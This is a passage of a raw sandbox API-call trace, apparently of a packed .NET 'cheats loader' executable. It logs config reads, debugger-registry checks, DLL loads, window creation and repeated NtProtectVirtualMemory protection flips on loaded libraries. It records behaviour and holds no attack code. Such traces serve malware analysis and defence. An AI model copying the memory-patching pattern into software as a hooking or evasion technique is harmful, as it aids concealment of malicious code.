lpProcName="OpenProcessToken") returned 0x756fefb0 [0064.745] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessTokenW") returned 0x0 [0064.745] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fef68 | out: TokenHandle=0x13fef68*=0x39c) returned 1 [0064.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x13fe9f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0064.753] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesEx") returned 0x0 [0064.755] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesExW") returned 0x7733ef00 [0064.755] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x13fef60 | out: lpFileInformation=0x13fef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0064.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x13fe9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0064.757] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x13fef68 | out: lpFileInformation=0x13fef68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0064.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x13fe95c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0064.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x13feea0) returned 1 [0064.761] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFile") returned 0x0 [0064.761] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xf0 [0064.764] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileType") returned 0x7733ef60 [0064.764] GetFileType (hFile=0xf0) returned 0x1 [0064.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x13fee9c) returned 1 [0064.764] GetFileType (hFile=0xf0) returned 0x1 [0064.825] GetFileSize (in: hFile=0xf0, lpFileSizeHigh=0x13fef5c | out: lpFileSizeHigh=0x13fef5c*=0x0) returned 0x8c8f [0064.826] ReadFile (in: hFile=0xf0, lpBuffer=0x3719ffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13fef18, lpOverlapped=0x0 | out: lpBuffer=0x3719ffc*, lpNumberOfBytesRead=0x13fef18*=0x1000, lpOverlapped=0x0) returned 1 [0064.845] ReadFile (in: hFile=0xf0, lpBuffer=0x3719ffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13fedc4, lpOverlapped=0x0 | out: lpBuffer=0x3719ffc*, lpNumberOfBytesRead=0x13fedc4*=0x1000, lpOverlapped=0x0) returned 1 [0064.846] ReadFile (in: hFile=0xf0, lpBuffer=0x3719ffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13fec78, lpOverlapped=0x0 | out: lpBuffer=0x3719ffc*, lpNumberOfBytesRead=0x13fec78*=0x1000, lpOverlapped=0x0) returned 1 [0064.847] ReadFile (in: hFile=0xf0, lpBuffer=0x3719ffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13fec78, lpOverlapped=0x0 | out: lpBuffer=0x3719ffc*, lpNumberOfBytesRead=0x13fec78*=0x1000, lpOverlapped=0x0) returned 1 [0064.847] ReadFile (in: hFile=0xf0, lpBuffer=0x3719ffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13fec78, lpOverlapped=0x0 | out: lpBuffer=0x3719ffc*, lpNumberOfBytesRead=0x13fec78*=0x1000, lpOverlapped=0x0) returned 1 [0064.848] ReadFile (in: hFile=0xf0, lpBuffer=0x3719ffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13febb0, lpOverlapped=0x0 | out: lpBuffer=0x3719ffc*, lpNumberOfBytesRead=0x13febb0*=0x1000, lpOverlapped=0x0) returned 1 [0064.851] ReadFile (in: hFile=0xf0, lpBuffer=0x3719ffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13fed34, lpOverlapped=0x0 | out: lpBuffer=0x3719ffc*, lpNumberOfBytesRead=0x13fed34*=0x1000, lpOverlapped=0x0) returned 1 [0064.852] ReadFile (in: hFile=0xf0, lpBuffer=0x3719ffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13fec40, lpOverlapped=0x0 | out: lpBuffer=0x3719ffc*, lpNumberOfBytesRead=0x13fec40*=0x1000, lpOverlapped=0x0) returned 1 [0064.853] ReadFile (in: hFile=0xf0, lpBuffer=0x3719ffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13fec40, lpOverlapped=0x0 | out: lpBuffer=0x3719ffc*, lpNumberOfBytesRead=0x13fec40*=0xc8f, lpOverlapped=0x0) returned 1 [0064.853] ReadFile (in: hFile=0xf0, lpBuffer=0x3719ffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13fed04, lpOverlapped=0x0 | out: lpBuffer=0x3719ffc*, lpNumberOfBytesRead=0x13fed04*=0x0, lpOverlapped=0x0) returned 1 [0064.853] CloseHandle (hObject=0xf0) returned 1 [0064.855] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13ff0b0 | out: TokenHandle=0x13ff0b0*=0xf0) returned 1 [0064.855] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13ff0b0 | out: TokenHandle=0x13ff0b0*=0x3a0) returned 1 [0064.856] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fef68 | out: TokenHandle=0x13fef68*=0x3a4) returned 1 [0064.856] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x13fef60 | out: lpFileInformation=0x13fef60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0064.856] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", nBufferLength=0x105, lpBuffer=0x13fe9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", lpFilePart=0x0) returned 0x3a [0064.856] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x13fef68 | out: lpFileInformation=0x13fef68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0064.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13ff0b0 | out: TokenHandle=0x13ff0b0*=0x3a8) returned 1 [0064.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13ff0b0 | out: TokenHandle=0x13ff0b0*=0x3ac) returned 1 [0064.894] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fef10 | out: TokenHandle=0x13fef10*=0x3b0) returned 1 [0064.899] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fef20 | out: TokenHandle=0x13fef20*=0x3b4) returned 1 [0064.904] SysReAllocStringLen (in: pbstr=0x13fec64*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13fec64*="kernel32") returned 1 [0064.904] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0064.904] GetModuleHandleW (lpModuleName="kernel32") returned 0x772d0000 [0064.906] GetProcAddress (hModule=0x772d0000, lpProcName="LCMapStringEx") returned 0x772e7480 [0064.908] GetProcAddress (hModule=0x750c0000, lpProcName="GetSystemMetrics") returned 0x750eddc0 [0064.914] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandle") returned 0x0 [0064.914] SysReAllocStringLen (in: pbstr=0x13ff200*=0x0, psz="comctl32.dll", len=0xc | out: pbstr=0x13ff200*="comctl32.dll") returned 1 [0064.914] CharLowerBuffW (in: lpsz="comctl32.dll", cchLength=0xc | out: lpsz="comctl32.dll") returned 0xc [0064.915] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x741e0000 [0064.919] GetProcAddress (hModule=0x750c0000, lpProcName="AdjustWindowRectEx") returned 0x750d2f80 [0064.919] AdjustWindowRectEx (in: lpRect=0x13ff340, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x13ff340) returned 1 [0064.934] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentThread") returned 0x772e8810 [0064.937] GetProcAddress (hModule=0x772d0000, lpProcName="DuplicateHandle") returned 0x7733eac0 [0064.937] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x13ff254, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x13ff254*=0x3b8) returned 1 [0064.941] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentThreadId") returned 0x772e8820 [0064.953] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentActCtx") returned 0x772e78c0 [0064.953] GetCurrentActCtx (in: lphActCtx=0x13ff1b4 | out: lphActCtx=0x13ff1b4*=0x0) returned 1 [0064.954] GetProcAddress (hModule=0x772d0000, lpProcName="ActivateActCtx") returned 0x772e77e0 [0064.954] ActivateActCtx (in: hActCtx=0xb823c, lpCookie=0x13ff1c4 | out: hActCtx=0xb823c, lpCookie=0x13ff1c4) returned 1 [0064.954] SysReAllocStringLen (in: pbstr=0x13ff150*=0x0, psz="comctl32.dll", len=0xc | out: pbstr=0x13ff150*="comctl32.dll") returned 1 [0064.954] CharLowerBuffW (in: lpsz="comctl32.dll", cchLength=0xc | out: lpsz="comctl32.dll") returned 0xc [0064.954] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0064.956] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibrary") returned 0x0 [0064.957] SysReAllocStringLen (in: pbstr=0x13ff13c*=0x0, psz="comctl32.dll", len=0xc | out: pbstr=0x13ff13c*="comctl32.dll") returned 1 [0064.957] CharLowerBuffW (in: lpsz="comctl32.dll", cchLength=0xc | out: lpsz="comctl32.dll") returned 0xc [0064.957] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6fb20000 [0065.780] GetLastError () returned 0x7e [0065.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0065.780] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0065.780] GetModuleFileNameA (in: hModule=0x6fb20000, lpFilename=0x13ff018, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.15063.483_none_6dad63fefc436da8\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.15063.483_none_6dad63fefc436da8\\comctl32.dll")) returned 0x79 [0065.780] GetCurrentProcess () returned 0xffffffff [0065.780] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff11c*=0x6fcc8770, NumberOfBytesToProtect=0x13ff120, NewAccessProtection=0x4, OldAccessProtection=0x13ff154 | out: BaseAddress=0x13ff11c*=0x6fcc8000, NumberOfBytesToProtect=0x13ff120, OldAccessProtection=0x13ff154*=0x2) returned 0x0 [0065.781] GetCurrentProcess () returned 0xffffffff [0065.781] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff11c*=0x6fcc8770, NumberOfBytesToProtect=0x13ff120, NewAccessProtection=0x2, OldAccessProtection=0x13ff154 | out: BaseAddress=0x13ff11c*=0x6fcc8000, NumberOfBytesToProtect=0x13ff120, OldAccessProtection=0x13ff154*=0x4) returned 0x0 [0065.781] GetCurrentProcess () returned 0xffffffff [0065.781] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff11c*=0x6fcc878c, NumberOfBytesToProtect=0x13ff120, NewAccessProtection=0x4, OldAccessProtection=0x13ff154 | out: BaseAddress=0x13ff11c*=0x6fcc8000, NumberOfBytesToProtect=0x13ff120, OldAccessProtection=0x13ff154*=0x2) returned 0x0 [0065.781] GetCurrentProcess () returned 0xffffffff [0065.781] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff11c*=0x6fcc878c, NumberOfBytesToProtect=0x13ff120, NewAccessProtection=0x2, OldAccessProtection=0x13ff154 | out: BaseAddress=0x13ff11c*=0x6fcc8000, NumberOfBytesToProtect=0x13ff120, OldAccessProtection=0x13ff154*=0x4) returned 0x0 [0065.782] SetLastError (dwErrCode=0x7e) [0065.786] SysReAllocStringLen (in: pbstr=0x13ff08c*=0x0, psz="user32.dll", len=0xa | out: pbstr=0x13ff08c*="user32.dll") returned 1 [0065.786] CharLowerBuffW (in: lpsz="user32.dll", cchLength=0xa | out: lpsz="user32.dll") returned 0xa [0065.786] GetModuleHandleW (lpModuleName="user32.dll") returned 0x750c0000 [0065.886] GetProcAddress (hModule=0x772d0000, lpProcName="WideCharToMultiByte") returned 0x772e6b10 [0065.890] GetProcAddress (hModule=0x750c0000, lpProcName="DefWindowProcW") returned 0x743c0140 [0065.891] SysReAllocStringLen (in: pbstr=0x13fe47c*=0x0, psz="gdi32.dll", len=0x9 | out: pbstr=0x13fe47c*="gdi32.dll") returned 1 [0065.891] CharLowerBuffW (in: lpsz="gdi32.dll", cchLength=0x9 | out: lpsz="gdi32.dll") returned 0x9 [0065.891] LoadLibraryExW (lpLibFileName="gdi32.dll", hFile=0x0, dwFlags=0x0) returned 0x74910000 [0065.891] GetLastError () returned 0x0 [0065.891] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0065.892] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0065.892] GetModuleFileNameA (in: hModule=0x74910000, lpFilename=0x13fe360, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0065.892] GetCurrentProcess () returned 0xffffffff [0065.892] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe464*=0x7492a034, NumberOfBytesToProtect=0x13fe468, NewAccessProtection=0x4, OldAccessProtection=0x13fe49c | out: BaseAddress=0x13fe464*=0x7492a000, NumberOfBytesToProtect=0x13fe468, OldAccessProtection=0x13fe49c*=0x2) returned 0x0 [0065.892] GetCurrentProcess () returned 0xffffffff [0065.892] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe464*=0x7492a034, NumberOfBytesToProtect=0x13fe468, NewAccessProtection=0x2, OldAccessProtection=0x13fe49c | out: BaseAddress=0x13fe464*=0x7492a000, NumberOfBytesToProtect=0x13fe468, OldAccessProtection=0x13fe49c*=0x4) returned 0x0 [0065.892] GetCurrentProcess () returned 0xffffffff [0065.892] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe464*=0x7492a038, NumberOfBytesToProtect=0x13fe468, NewAccessProtection=0x4, OldAccessProtection=0x13fe49c | out: BaseAddress=0x13fe464*=0x7492a000, NumberOfBytesToProtect=0x13fe468, OldAccessProtection=0x13fe49c*=0x2) returned 0x0 [0065.892] GetCurrentProcess () returned 0xffffffff [0065.892] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe464*=0x7492a038, NumberOfBytesToProtect=0x13fe468, NewAccessProtection=0x2, OldAccessProtection=0x13fe49c | out: BaseAddress=0x13fe464*=0x7492a000, NumberOfBytesToProtect=0x13fe468, OldAccessProtection=0x13fe49c*=0x4) returned 0x0 [0065.893] SetLastError (dwErrCode=0x0) [0065.893] GetProcAddress (hModule=0x74910000, lpProcName="GetStockObject") returned 0x749166c0 [0065.893] GetStockObject (i=5) returned 0x900015 [0065.896] GetProcAddress (hModule=0x750c0000, lpProcName="RegisterClass") returned 0x0 [0065.896] GetProcAddress (hModule=0x750c0000, lpProcName="RegisterClassW") returned 0x750e8720 [0065.897] GetProcAddress (hModule=0x74270000, lpProcName="GetProcessExecutableHeap") returned 0x74282640 [0065.897] GetProcAddress (hModule=0x74150000, lpProcName="GetProcessExecutableHeap_RetAddr") returned 0x0 [0065.897] GetProcAddress (hModule=0x74150000, lpProcName="GetProcessExecutableHeap") returned 0x74154a40 [0065.900] CoTaskMemAlloc (cb=0x5c) returned 0x78d90 [0065.900] RegisterClassW (lpWndClass=0x13ff068) returned 0xc19e [0065.901] CoTaskMemFree (pv=0x78d90) [0065.901] GetProcAddress (hModule=0x750c0000, lpProcName="CreateWindowEx") returned 0x0 [0065.901] GetProcAddress (hModule=0x750c0000, lpProcName="CreateWindowExW") returned 0x750e8780 [0065.901] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.1ca0192_r35_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xa90000, lpParam=0x0) returned 0x302ba [0065.903] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowLong") returned 0x0 [0065.903] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowLongW") returned 0x743c1ab0 [0065.903] SetWindowLongW (hWnd=0x302ba, nIndex=-4, dwNewLong=1950089536) returned 10880446 [0065.904] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowLong") returned 0x0 [0065.904] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowLongW") returned 0x743c0020 [0065.904] GetWindowLongW (hWnd=0x302ba, nIndex=-4) returned 1950089536 [0065.907] SysReAllocStringLen (in: pbstr=0x13fe6ec*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13fe6ec*="kernel32") returned 1 [0065.907] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0065.907] GetModuleHandleW (lpModuleName="kernel32") returned 0x772d0000 [0065.909] GetProcAddress (hModule=0x772d0000, lpProcName="FindNLSStringEx") returned 0x772e70f0 [0065.909] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fe888 | out: phkResult=0x13fe888*=0x3c4) returned 0x0 [0065.910] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueEx") returned 0x0 [0065.910] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExW") returned 0x756fe5a0 [0065.910] RegQueryValueExW (in: hKey=0x3c4, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x13fe8a8, lpData=0x0, lpcbData=0x13fe8a4*=0x0 | out: lpType=0x13fe8a8*=0x0, lpData=0x0, lpcbData=0x13fe8a4*=0x0) returned 0x2 [0065.910] RegQueryValueExW (in: hKey=0x3c4, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x13fe8a8, lpData=0x0, lpcbData=0x13fe8a4*=0x0 | out: lpType=0x13fe8a8*=0x0, lpData=0x0, lpcbData=0x13fe8a4*=0x0) returned 0x2 [0065.910] RegCloseKey (hKey=0x3c4) returned 0x0 [0065.911] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowLong") returned 0x0 [0065.911] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowLongW") returned 0x743c1ab0 [0065.911] SetWindowLongW (hWnd=0x302ba, nIndex=-4, dwNewLong=10880486) returned 1950089536 [0065.911] GetWindowLongW (hWnd=0x302ba, nIndex=-4) returned 10880486 [0065.912] GetWindowLongW (hWnd=0x302ba, nIndex=-16) returned 113311744 [0065.912] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc19f [0065.912] GetProcAddress (hModule=0x750c0000, lpProcName="CallWindowProc") returned 0x0 [0065.913] GetProcAddress (hModule=0x750c0000, lpProcName="CallWindowProcW") returned 0x743c00f0 [0065.928] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1a0 [0065.928] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302ba, Msg=0x81, wParam=0x0, lParam=0x13febd8) returned 0x1 [0065.929] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302ba, Msg=0x83, wParam=0x0, lParam=0x13febc4) returned 0x0 [0066.252] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302ba, Msg=0x1, wParam=0x0, lParam=0x13febd8) returned 0x0 [0066.252] GetProcAddress (hModule=0x750c0000, lpProcName="GetClientRect") returned 0x750d9650 [0066.252] GetClientRect (in: hWnd=0x302ba, lpRect=0x13fe8c0 | out: lpRect=0x13fe8c0) returned 1 [0066.253] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowRect") returned 0x750e6c50 [0066.253] GetWindowRect (in: hWnd=0x302ba, lpRect=0x13fe8c0 | out: lpRect=0x13fe8c0) returned 1 [0066.255] GetProcAddress (hModule=0x750c0000, lpProcName="GetParent") returned 0x750d8570 [0066.255] GetParent (hWnd=0x302ba) returned 0x0 [0066.257] GetProcAddress (hModule=0x772d0000, lpProcName="DeactivateActCtx") returned 0x772e7860 [0066.257] DeactivateActCtx (dwFlags=0x0, ulCookie=0x18d00001) returned 1 [0066.353] SysReAllocStringLen (in: pbstr=0x13ff270*=0x0, psz="comctl32.dll", len=0xc | out: pbstr=0x13ff270*="comctl32.dll") returned 1 [0066.354] CharLowerBuffW (in: lpsz="comctl32.dll", cchLength=0xc | out: lpsz="comctl32.dll") returned 0xc [0066.354] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x741e0000 [0066.354] AdjustWindowRectEx (in: lpRect=0x13ff32c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x13ff32c) returned 1 [0066.354] GetSystemMetrics (nIndex=59) returned 1460 [0066.354] GetSystemMetrics (nIndex=60) returned 920 [0066.354] GetSystemMetrics (nIndex=34) returned 136 [0066.354] GetSystemMetrics (nIndex=35) returned 39 [0066.355] SysReAllocStringLen (in: pbstr=0x13ff174*=0x0, psz="comctl32.dll", len=0xc | out: pbstr=0x13ff174*="comctl32.dll") returned 1 [0066.355] CharLowerBuffW (in: lpsz="comctl32.dll", cchLength=0xc | out: lpsz="comctl32.dll") returned 0xc [0066.355] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x741e0000 [0066.355] AdjustWindowRectEx (in: lpRect=0x13ff22c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x13ff22c) returned 1 [0066.450] GetProcAddress (hModule=0x74910000, lpProcName="CreateCompatibleDC") returned 0x743c0720 [0066.451] CreateCompatibleDC (hdc=0x0) returned 0xa3010527 [0066.458] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemDefaultLCID") returned 0x772e53e0 [0066.460] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemDefaultLCIDW") returned 0x0 [0066.462] GetSystemDefaultLCID () returned 0x409 [0066.462] GetProcAddress (hModule=0x74910000, lpProcName="GetStockObject") returned 0x749166c0 [0066.462] GetStockObject (i=17) returned 0xa01c1 [0066.463] GetProcAddress (hModule=0x74910000, lpProcName="GetObject") returned 0x0 [0066.463] GetProcAddress (hModule=0x74910000, lpProcName="GetObjectW") returned 0x74916d60 [0066.464] GetObjectW (in: h=0xa01c1, c=92, pv=0x13ff070 | out: pv=0x13ff070) returned 92 [0066.464] GetProcAddress (hModule=0x750c0000, lpProcName="GetDC") returned 0x743ba3f0 [0066.464] GetDC (hWnd=0x0) returned 0x10105d6 [0066.466] SysReAllocStringLen (in: pbstr=0x13fd9f4*=0x0, psz="gdiplus.dll", len=0xb | out: pbstr=0x13fd9f4*="gdiplus.dll") returned 1 [0066.466] CharLowerBuffW (in: lpsz="gdiplus.dll", cchLength=0xb | out: lpsz="gdiplus.dll") returned 0xb [0066.467] LoadLibraryExW (lpLibFileName="gdiplus.dll", hFile=0x0, dwFlags=0x0) returned 0x6f9b0000 [0067.250] GetLastError () returned 0x0 [0067.251] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0067.251] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0067.251] GetModuleFileNameA (in: hModule=0x6f9b0000, lpFilename=0x13fd8d8, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.15063.483_none_9e9856e456d5e776\\gdiplus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.15063.483_none_9e9856e456d5e776\\gdiplus.dll")) returned 0x70 [0067.251] GetCurrentProcess () returned 0xffffffff [0067.251] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fd9dc*=0x6faf647c, NumberOfBytesToProtect=0x13fd9e0, NewAccessProtection=0x4, OldAccessProtection=0x13fda14 | out: BaseAddress=0x13fd9dc*=0x6faf6000, NumberOfBytesToProtect=0x13fd9e0, OldAccessProtection=0x13fda14*=0x2) returned 0x0 [0067.251] GetCurrentProcess () returned 0xffffffff [0067.251] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fd9dc*=0x6faf647c, NumberOfBytesToProtect=0x13fd9e0, NewAccessProtection=0x2, OldAccessProtection=0x13fda14 | out: BaseAddress=0x13fd9dc*=0x6faf6000, NumberOfBytesToProtect=0x13fd9e0, OldAccessProtection=0x13fda14*=0x4) returned 0x0 [0067.251] GetCurrentProcess () returned 0xffffffff [0067.251] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fd9dc*=0x6faf6484, NumberOfBytesToProtect=0x13fd9e0, NewAccessProtection=0x4, OldAccessProtection=0x13fda14 | out: BaseAddress=0x13fd9dc*=0x6faf6000, NumberOfBytesToProtect=0x13fd9e0, OldAccessProtection=0x13fda14*=0x2) returned 0x0 [0067.252] GetCurrentProcess () returned 0xffffffff [0067.252] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fd9dc*=0x6faf6484, NumberOfBytesToProtect=0x13fd9e0, NewAccessProtection=0x2, OldAccessProtection=0x13fda14 | out: BaseAddress=0x13fd9dc*=0x6faf6000, NumberOfBytesToProtect=0x13fd9e0, OldAccessProtection=0x13fda14*=0x4) returned 0x0 [0067.252] GetCurrentProcess () returned 0xffffffff [0067.252] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fd9dc*=0x6faf63e4, NumberOfBytesToProtect=0x13fd9e0, NewAccessProtection=0x4, OldAccessProtection=0x13fda14 | out: BaseAddress=0x13fd9dc*=0x6faf6000, NumberOfBytesToProtect=0x13fd9e0, OldAccessProtection=0x13fda14*=0x2) returned 0x0 [0067.252] GetCurrentProcess () returned 0xffffffff [0067.252] NtProtectVirtualMemory (in: 